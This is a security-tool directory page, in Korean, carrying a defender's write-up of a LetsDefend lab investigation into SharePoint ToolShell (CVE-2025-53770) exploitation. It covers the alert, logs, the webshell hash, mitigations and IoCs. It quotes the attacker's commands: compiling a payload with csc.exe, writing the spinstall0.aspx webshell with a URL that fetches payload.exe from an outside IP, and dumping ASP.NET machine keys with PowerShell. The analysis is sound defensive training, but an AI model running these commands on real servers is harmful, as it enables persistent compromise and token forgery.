Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE — 분석 능력과 보고서 작성을 훈련하는 활동 | Kitploit
도구/GitHubGitHub/bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce
Vulnerability AnalysisExploitationWeb Application ExploitationForensicsThreat IntelligenceLearning & EducationIncident ResponseLabs & Practice
GitHub
bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce

-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

분석 능력과 보고서 작성을 훈련하는 활동

저장소 보기
191년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

이는 최근 SharePoint CVE를 기반으로 Let's Defend 플랫폼에서 수행된 조사입니다. 살펴보겠습니다.

Immagine 2025-07-27 162109
  1. 규칙 이름을 살펴보십시오. 일반적으로 규칙 이름은 탐지할 공격을 위해 특별히 생성됩니다. 규칙 이름을 조사하면 어떤 공격에 직면했는지 이해할 수 있습니다.

SOC342 규칙은 취약한 ToolPane.aspx 페이지를 대상으로 하는 인증되지 않은 POST 요청을 탐지했습니다. 특징은 다음과 같습니다.

  • 대용량 페이로드 (Content-Length: 7699)
  • 출처를 난독화하기 위해 사용된 것으로 보이는 의심스러운 리퍼러 (SignOut.aspx)
  • ToolShell 취약점 악용과 일치하는 동작
  1. 트래픽이 발생하는 두 장치 간을 탐지합니다.

외부 사용자(IP: 107.191.58.76)가 내부 SharePoint 서버(172.16.20.17)로 조작된 요청을 보냈습니다.

엔드포인트 로그 분석

2

인코딩된 PowerShell 명령어를 실행하는 w3wp.exe 프로세스는 잠재적인 익스플로잇 또는 사후 침투 활동(예: 숨겨진 페이로드 실행)을 나타낼 수 있습니다.

SharePoint 환경에서는 이 동작이 예상되는지 또는 악용을 나타내는지 확인하는 것이 중요합니다.

명령어는 base64를 사용하여 난독화되었습니다.

Immagine 2025-07-27 163800

이 페이로드를 통해 공격자는 실행 중인 머신의 중요한 ASP.NET 구성 키를 추출하고 출력할 수 있습니다.

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs

"C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

서버에서 C# 소스 코드로부터 실행 파일을 컴파일합니다.

SharePoint 경로에 웹 백도어(악성 ASPX 파일)를 생성합니다. 방문 시 외부 페이로드가 실행되거나 다운로드됩니다.

cmd.exe /c echo > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

이 명령어는 SharePoint LAYOUTS 폴더에 spinstall0.aspx라는 파일을 생성하고 그 안에 내용을 씁니다 (여기서 은 웹쉘 코드를 나타내는 플레이스홀더입니다).

spinstall0.aspx의 해시 값입니다: 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514

VirusTotal에서 확인해 보겠습니다.

Immagine 2025-07-27 164912

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"

이 명령어를 통해 공격자는 MachineKeySection의 애플리케이션 구성에 접근하여 검증 키 및 복호화 키와 같은 민감한 암호화 키를 노출시킬 수 있습니다.

이 키들은 ASP.NET 보안에 중요하며, 인증 쿠키와 ViewState 등을 보호합니다.

이러한 키를 노출하거나 검색하면 공격자가 인증 토큰을 위조하거나 보호된 데이터를 복호화하거나 웹 애플리케이션에 대한 다른 공격을 수행할 수 있습니다.

MITRE ATT&CK

mitre

분석가 노트:

이 경보는 SharePoint 서버에서 관찰된 비정상적인 PowerShell 활동으로 인해 발생했으며, 이후 CVE-2025-53770을 대상으로 한 익스플로잇 시도로 확인되었습니다. 공격자는 먼저 C# 컴파일러(csc.exe)를 사용하여 사용자 정의 C# 실행 파일(payload.exe)을 드롭하고 컴파일한 다음, 웹에서 접근 가능한 SharePoint 디렉토리 내에 악성 ASPX 웹쉘(spinstall0.aspx)을 생성했습니다. 그 후 .NET 리플렉션을 통해 서버 구성에서 민감한 암호화 머신 키를 검색하기 위해 PowerShell 명령어가 실행되었습니다. 이 일련의 작업은 지속적인 제어를 유지하고 잠재적으로 인증 토큰을 위조하기 위한 다단계 공격을 시사합니다. 웹쉘은 VirusTotal 탐지율 39/62로 악성으로 확인되었습니다. 이 사건은 참양성(true positive)으로 확인되었으며, 추가 차단 및 정리 조치가 권장됩니다.

Immagine 2025-07-27 170751

CVE-2025-53770 세부 정보

온프레미스 Microsoft SharePoint Server에서 신뢰할 수 없는 데이터의 역직렬화로 인해 인증되지 않은 공격자가 네트워크를 통해 코드를 실행할 수 있습니다. Microsoft는 CVE-2025-53770에 대한 익스플로잇이 실제 환경에 존재함을 인지하고 있습니다. Microsoft는 이 취약점을 해결하기 위한 포괄적인 업데이트를 준비하고 완전히 테스트 중입니다. 그 동안 이 CVE 문서에 제공된 완화 조치가 시행되어 익스플로잇으로부터 보호되도록 하십시오.

Immagine 2025-07-27 171020

Microsoft가 제안하는 완화 조치:

  1. 지원되는 온프레미스 SharePoint Server 버전 사용
  2. 위에 링크된 최신 보안 업데이트 적용
  3. Microsoft Defender for Endpoint 보호 또는 이에 상응하는 위협 솔루션 배포
  4. AMSI(안티맬웨어 검사 인터페이스)가 켜져 있고 Defender Antivirus와 같은 적절한 안티바이러스 솔루션과 함께 올바르게 구성되었는지 확인
  5. SharePoint Server ASP.NET 머신 키 교체

IoC

Spinstall0.aspx 위협 행위자가 사용한 웹쉘

행위자들은 spinstall.aspx, spinstall1.aspx, spinstall2.aspx와 같은 다양한 방식으로 파일 이름을 수정하기도 했습니다.

이 보고서는 Let's Defend 플랫폼에서 수행된 활동을 기반으로 합니다. 제시된 모든 결과와 자료는 교육 목적으로만 제공됩니다. 모든 권리와 소유권은 Let's Defend에 있습니다.

도구 다운로드